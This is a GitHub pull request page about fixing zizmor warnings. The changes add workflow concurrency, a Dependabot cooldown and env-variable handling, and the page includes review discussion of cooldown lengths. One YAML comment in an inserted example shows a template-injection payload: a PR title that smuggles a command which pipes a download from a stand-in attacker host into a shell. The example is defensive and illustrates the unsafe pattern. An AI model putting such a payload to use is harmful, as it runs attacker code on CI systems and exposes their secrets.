
Conversation

@da1910
Collaborator

@da1910 da1910 commented Dec 30, 2025

Fix zizmor warnings from 2025/12/30T00:16:29Z

Workflow concurrency improvements:

  • Added the concurrency configuration to .github/workflows/ci_cd.yml, .github/workflows/dependabot_approve.yml, and .github/workflows/security_checks.yml to ensure that only one workflow run per pull request or ref is active at a time, canceling any in-progress runs for the same group.

Dependabot configuration enhancements:

  • Introduced a cooldown period in .github/dependabot.yml for both pip and github-actions ecosystems, setting default-days to 5 and semver-patch-days to 3, to reduce the risk of supply chain attacks.

Dependabot approval workflow fixes:

  • Updated environment variable usage in the dependabot_approve.yml workflow to use explicit variables (REPOSITORY, EVENT_NUMBER, PR_URL) to reduce the risk of code injection attacks.
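
The two workflow-side fixes described above, shown together in one hardened workflow. This is an added example written for this note, not the project's own dependabot_approve.yml: the workflow name, job name, trigger, the gh command, and the use of the PR title as the illustrative injectable value are assumptions; the three variable names match those the description lists.

```yaml
# Added example, not the project's own dependabot_approve.yml.
# Workflow/job names, the trigger and the gh command are assumptions.
name: Dependabot auto-approve

on:
  pull_request:

# Exactly one active run per pull request (or per ref for non-PR events);
# a newer push to the same group cancels the run still in progress.
concurrency:
  group: ${{ github.workflow }}-${{ github.event.pull_request.number || github.ref }}
  cancel-in-progress: true

permissions:
  contents: read
  pull-requests: write

jobs:
  approve:
    runs-on: ubuntu-latest
    if: github.event.pull_request.user.login == 'dependabot[bot]'
    steps:
      # UNSAFE pattern (what zizmor's template-injection check flags):
      # the ${{ }} expression is substituted into the script text *before*
      # bash parses it, so attacker-controlled event data such as a PR
      # title of   x"; curl attacker.example | sh; echo "   runs as shell.
      #
      #   - run: echo "Approving ${{ github.event.pull_request.title }}"
      #
      # SAFE pattern: route every piece of event data through env so bash
      # receives it as variable contents, then quote the expansion.
      - name: Approve the PR
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          REPOSITORY: ${{ github.repository }}
          EVENT_NUMBER: ${{ github.event.number }}
          PR_URL: ${{ github.event.pull_request.html_url }}
        run: |
          echo "Approving #${EVENT_NUMBER} in ${REPOSITORY}"
          gh pr review --approve "$PR_URL"
```

The `concurrency.group` key uses the PR number when one exists and falls back to the ref, which is why runs for a push to `main` do not cancel runs for an open PR. The env-var pattern is the general fix: any `${{ github.event.* }}` value that a fork author can set (title, body, branch name, commit message) must never appear inside `run:` directly.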

@github-actions github-actions bot added the maintenance Package and maintenance related label Dec 30, 2025
@da1910 da1910 changed the title CI - Zizmor Fixes Zizmor - Fix CI warnings with template injection and concurrency Dec 30, 2025
@codecov

codecov bot commented Dec 30, 2025

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 94.76%. Comparing base (cf089c0) to head (e8fac28).
⚠️ Report is 2 commits behind head on main.

Additional details and impacted files
@@           Coverage Diff           @@
##             main     #939   +/-   ##
=======================================
  Coverage   94.76%   94.76%           
=======================================
  Files           7        7           
  Lines         802      802           
=======================================
  Hits          760      760           
  Misses         42       42           


Comment on lines +10 to +11
default-days: 5
semver-patch-days: 3
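Review bot: `semver-patch-days: 3` gives patch releases a shorter cooldown than the `default-days: 5` that covers every other release type, and nothing beside the setting records why; add a YAML comment next to these two keys stating the trade-off (patch diffs are small and often carry security fixes, versus the exposure window for a malicious patch release) so the next editor does not flatten both to one value without knowing what was intended.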
Contributor

What is the reasoning behind having a shorter cooldown period for patches?

Collaborator Author

Patches tend to be smaller in scope, so easier to review diffs, and they're usually the change that's produced to fix security issues, where we do want a faster throughput.

That said, we can happily change it if we prefer; this was a first pass.

Contributor

@ludovicsteinbach ludovicsteinbach Jan 2, 2026

I don't have a strong opinion, I was just curious. For other repos I think I had only defined a default cooldown of 7 days, regardless of the semver version. And I cannot really remember if there was consensus at the PyAnsys level.

I suppose a supply chain attack is more likely to be achieved via a patch than a major release (to maximize reach), so from a security perspective I would be inclined to think that patches are more vulnerable. But I suppose there isn't much difference between 3 days and 5 days cooldown in that context.
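
For reference, where the values discussed in this thread sit in a Dependabot configuration. This is an added example written for this note, not the project's .github/dependabot.yml: the directory and schedule values are assumptions, and the cooldown block is repeated per `updates` entry because it is not a global setting. A cooldown only delays when Dependabot first proposes a release; it gives the ecosystem time to yank or report a malicious version, and performs no inspection of its own.

```yaml
# Added example, not the project's own .github/dependabot.yml.
# directory and schedule values are assumptions.
version: 2
updates:
  - package-ecosystem: "pip"
    directory: "/"
    schedule:
      interval: "weekly"
    # Wait before proposing a newly published release; patch releases
    # get the shorter window discussed above. Applies to this entry only.
    cooldown:
      default-days: 5
      semver-patch-days: 3

  - package-ecosystem: "github-actions"
    directory: "/"
    schedule:
      interval: "weekly"
    # The same cooldown must be declared again here, or the actions
    # ecosystem gets no delay at all.
    cooldown:
      default-days: 5
      semver-patch-days: 3
```

Pairing the cooldown with SHA-pinned action references (the other zizmor recommendation for the github-actions ecosystem) means a delayed update still lands as a reviewable, immutable pin rather than a floating tag.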

@da1910 da1910 added this pull request to the merge queue Jan 2, 2026
@github-merge-queue github-merge-queue bot removed this pull request from the merge queue due to failed status checks Jan 2, 2026
@da1910 da1910 added this pull request to the merge queue Jan 5, 2026
Merged via the queue into main with commit b4fc410 Jan 5, 2026
32 checks passed
@da1910 da1910 deleted the ci/zizmor branch January 5, 2026 08:38